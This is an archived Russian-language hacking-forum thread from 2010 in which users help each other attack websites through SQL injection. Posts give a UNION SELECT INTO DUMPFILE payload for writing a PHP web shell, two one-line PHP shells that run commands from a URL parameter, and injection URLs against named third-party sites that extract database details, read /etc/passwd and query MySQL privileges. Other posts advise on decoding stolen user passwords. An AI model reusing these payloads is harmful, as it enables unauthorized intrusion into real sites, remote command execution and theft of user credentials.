ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12241  
Старый 29.03.2010, 16:45
Mondeo11
Новичок
Регистрация: 24.02.2010
Сообщений: 1
Провел на форуме:
95964

Репутация: 1
По умолчанию

---

Последний раз редактировалось Mondeo11; 31.03.2010 в 18:22..
 
Ответить с цитированием

  #12242  
Старый 29.03.2010, 16:58
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Mondeo11  
обычная инъекция,делаю выборку паролей юзеров и получаю записи вида


и т.п. я так понимаю это в каком-то бинарном виде или что? как получить в норм виде?

для начала, узнать алгоритм шифрования
 
Ответить с цитированием

  #12243  
Старый 29.03.2010, 17:50
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

ребят, хочу залить шелл посредством SQL, а именно:

union+select+1,'<?php код вашего шелла ?>',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*

php код вашего шелла - сюда не вариант ведь пихать весь код, например, шелла от madnet'a.
Посоветуйте, какой "мини" шелл или команду выполнить там, чтобы потом можно было залить полноценный шелл?
 
Ответить с цитированием

  #12244  
Старый 29.03.2010, 18:20
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

<?
echo "<pre>";
system($_GET["id"]);
echo "</pre>";
?>

вот и весь шелл)))
 
Ответить с цитированием

  #12245  
Старый 29.03.2010, 18:41
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

<? system($_GET[cmd]); ?>
 
Ответить с цитированием

  #12246  
Старый 29.03.2010, 19:32
olishort
Участник форума
Регистрация: 13.04.2009
Сообщений: 121
Провел на форуме:
436858

Репутация: 33
По умолчанию

нашел sql уязвимость

выдает ошибку
PHP код:
SQL query SELECT FROM mobiticket.structure_page WHERE tag '595'' AND status = 'active' failed with error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'active'' at line 3 
после SELECT * FROM mobiticket.structure_page WHERE tag = '595'' идет AND

до AND сработает union? /* не обрыв строки? спасибо!

Последний раз редактировалось olishort; 29.03.2010 в 19:39..
 
Ответить с цитированием

  #12247  
Старый 29.03.2010, 19:47
street16
Познающий
Регистрация: 18.09.2006
Сообщений: 43
Провел на форуме:
468989

Репутация: 3
По умолчанию

http://themood.ru/index.php?pr=15'
Полскажите пожалуйста есть ли тут инъекция?все уже перепробывал.Если нет то почему ошибка выскакивает?спасибо!
 
Ответить с цитированием

  #12248  
Старый 29.03.2010, 19:51
_iks_
Познающий
Регистрация: 21.02.2009
Сообщений: 54
Провел на форуме:
1224548

Репутация: 134
По умолчанию

Цитата:
Сообщение от street16  
http://themood.ru/index.php?pr=15'
Полскажите пожалуйста есть ли тут инъекция?все уже перепробывал.Если нет то почему ошибка выскакивает?спасибо!
http://themood.ru/index.php?pr=1500+union+select+1,2,3,concat(versio n(),0x3a,user(),0x3a,database()),5,6
 
Ответить с цитированием

  #12249  
Старый 29.03.2010, 20:30
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию

Цитата:
Сообщение от Mondeo11  
обычная инъекция,делаю выборку паролей юзеров и получаю записи вида


и т.п. я так понимаю это вроде в бинарном виде или что? уже видел записи в таком виде в других базах
Это скорее всего результат действия AES_ENCRYPT() или аналогов. Без доступа к сорсу точно не узнать (хотя можно попробовать посмотреть на свой пасс в надежде, что криптуется каким-нибудь маленьким постоянным словом).

PS А ну и естественно выводить через ascii()

Последний раз редактировалось budden; 29.03.2010 в 20:36..
 
Ответить с цитированием

  #12250  
Старый 30.03.2010, 00:11
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

проверяю на запись и пытаюсь записать так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user

если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?


например как быть тут
http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+file_priv,2,3,4+from+mysql.user+wh ere+user='stmary_stmary'--

тут ведь нет таблицы user

Последний раз редактировалось jecka3000; 30.03.2010 в 00:14..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ